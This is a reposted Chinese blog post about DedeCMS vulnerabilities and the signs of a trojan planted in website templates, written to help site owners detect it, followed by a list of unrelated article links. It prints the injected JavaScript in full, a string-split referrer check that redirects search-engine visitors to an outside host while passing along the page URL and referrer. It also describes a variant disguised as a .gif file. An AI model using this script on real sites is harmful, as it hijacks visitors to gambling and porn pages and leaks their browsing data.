dede最新漏洞以及黑客木马特征
2016-03-21 10:51
225 查看
dede最新漏洞以及黑客木马特征
时间:2013-08-04 12:48来源:疯子工作室 作者:疯子 点击: 次据疯子工作室统计,截止到今天,依旧有大约3万个使用dedecms管理系统程序开发的网站被黑客挂马。Dedecms后台系统程序升级到5.7 sp1版本之后,依旧存在很多漏洞。具体的情况,也是在最近一段时间彻底暴漏出来。据疯子工作室统计,截止到今天,依旧有大约3万个使用dedecms管理系统程序开发的网站被黑客挂马。目前,dedecms官网没有给予任何答复以及解决方案。另外,对于国内公认最具权威的360网站安全监测,很失望的是一直曝正常。这次针对于DEDE程序的木马,主要被运用于博彩以及色情行业相关网站做跳转。从中我们也看出一个问题,曾经被公认为正义之士的黑客良莠不济,多数还是以损害个人利益来谋取利润。 这次木马爆发的特征整体来说,黑客很聪明的判断网站首页、内容页的来源,对于来自百度等搜索引擎的人,强制跳转到不良网站。随着信息化的推进,黑客的技术不再局限于某个行业,相对而言,搜索引擎这个大市场,他们是不会放弃的。 木马的第一波特征:在你网站模板</head>后面会有一个{dede.dinfo}或者{dede:dsv}的自定义标签源码,第一波里面这个自定义标签里面的内容是一个js。 GID89a="";var s=document.referrer;var str=window.location.href;if(s.indexOf("go"+"o"+"gle")>0 || s.indexOf("b"+"ai"+"du")>0 || s.indexOf("y"+"ahoo")>0 || s.indexOf("s"+"ogou")>0 || s.indexOf("bing")>0 || s.indexOf("360")>0 || s.indexOf("s"+"os"+"o")>0 || s.indexOf("youdao")>0 )window.location.href="http://d.d8d.pw/images/a2.asp?cpy="+str+"&kecy="+s; 通过这写代码,我们不能看出一些我们所熟悉的身影。window.location.href,google,baidu,yahoo,sogou,bing,360,soso,youdao,而index就是我们在百度搜索引擎的索引项。 第二点变异木马特征是,位置相同,使用了编码过后的网址、和伪装成gif的js代码: 类似于在</head>后,会有一个<script href="%ds%wdd%dd/33.gif">,这个gif实际上是上面脚本修改后缀的结果。 这个代码文章挂马特征的源代码是通过右键看不出来的,我们需要借助一些工具,比如chinaz站长工具中查询网站源码功能,具体可以通过http://tool.chinaz.com/Tools/PageCode.aspx查询自己网站是否被挂了黑链。 注:本文由疯子工作室[/b]原创,转载请注明原文网址:http://www.madseo.net/topics/6.html |
相关文章推荐
- --《元哥的语录》--。。。。
- <div>里用display:block有用么?
- 我建了一个QQ群,别人如何不需要验证就能加入我的群
- Word文档中文字下有红色或绿色波浪线怎么去...
- DEDE5.7友情链接分类调用代码
- 网页背景音乐的HTML代码是什么?
- arclist标签在文章页列表页调用所有(全站)栏目最新文章热门文章的方法 [复制链接]
- DedeCMS让{dede:list}标签支持weight权重排序、flag属性
- dede list 2个不同栏目如何调用同一个栏目文章,类似副栏目?
- PHP错误报告等级设置 ,不再着ERROR的道
- ecshop促销时间倒计时效果
- ecshop 推荐商品
- PHP大小写:函数名和类名不区分,变量名区分
- javascript 函数和变量是区分大小写的
- 【转载】关于font-size:100%
- font:12px/1.5 表示什么意思
- css让图片变成圆角矩形 border-radius: 15px;
- Alt+Tab键的窗口切换界面一直不消失
- PHP:Notice: Undefined index: submit in
- 二、织梦CMS被挂马清理方法